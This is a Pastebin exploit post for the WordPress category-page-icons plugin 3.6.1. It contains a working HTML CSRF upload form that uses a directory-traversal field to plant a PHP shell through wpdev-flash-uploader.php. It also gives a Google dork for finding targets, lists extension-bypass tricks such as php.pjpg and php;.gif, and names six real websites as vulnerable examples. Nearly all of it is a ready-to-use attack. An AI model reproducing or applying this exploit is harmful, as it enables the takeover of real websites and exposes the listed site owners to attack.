KingSkrupellos

WordPress category-page-icons 3.6.1 CSRF Backdoor Access

Jan 16th, 2019
644
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.02 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress category-page-icons Plugins 3.6.1 CSRF Shell Upload
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 17/01/2019
  7. # Vendor Homepage : wordpress.org
  8. wp-premiumplugins.com/category-page-icons/
  9. wordpress.org/plugins/category-page-icons/
  10. # Software Download Link :
  11. github.com/wp-plugins/category-page-icons/archive/master.zip
  12. # Software Vulnerable Code => [ wpdev-flash-uploader.php ]
  13. plugins.svn.wordpress.org/category-page-icons/trunk/include/wpdev-flash-uploader.php
  14. github.com/wp-plugins/category-page-icons/blob/master/include/wpdev-flash-uploader.php
  15. # Version Information : Current Version 3.6.1 =>
  16. + Requires at least: 2.7 - Tested up to: 3.6.1 - Stable tag: 0.9.2
  17. # Tested On : Windows and Linux
  18. # Category : WebApps
  19. # Exploit Risk : Medium
  20. # Google Dorks : inurl:''/wp-content/plugins/category-page-icons/''
  21. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  22. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
  23. CWE-98 [ Improper Control of Filename for
  24. Include/Require Statement in PHP Program ('PHP File Inclusion') ]
  25.  
  26. ####################################################################
  27.  
  28. WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability
  29.  
  30. ####################################################################
  31.  
  32. # Arbitrary File Upload/Shell Upload CSRF Exploit :
  33. *********************************************
  34.  
  35. <form enctype="multipart/form-data"
  36. action="https://VULNERABLESITEHERE/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post">
  37. Your File: <input name="wpdev-async-upload" type="file" /><br />
  38. <input type="hidden" name="dir_icons" value="../../../../">
  39. <input type="submit" value="upload" />
  40. </form>
  41.  
  42. ####################################################################
  43.  
  44. # Directory File Path :
  45. *********************
  46.  
  47. SITE/[yourfilename.php.pjpg]
  48. SITE/wp-content/[yourfilename.php.pjpg]
  49.  
  50. # Allowed File Extensions : txt - jpg - gif - png -
  51.  
  52. html.jpg - php.pjpg - asp;.gif - php;.gif - phtml
  53.  
  54. ####################################################################
  55.  
  56. # Example Vulnerable Sites :
  57. *************************
  58.  
  59. [+] dtacmail.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  60.  
  61. [+] dutary.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  62.  
  63. [+] ddns2u.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  64.  
  65. [+] inuse.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  66.  
  67. [+] ceobible.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  68.  
  69. [+] guruok.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
  70.  
  71. ####################################################################
  72.  
  73. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  74.  
  75. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment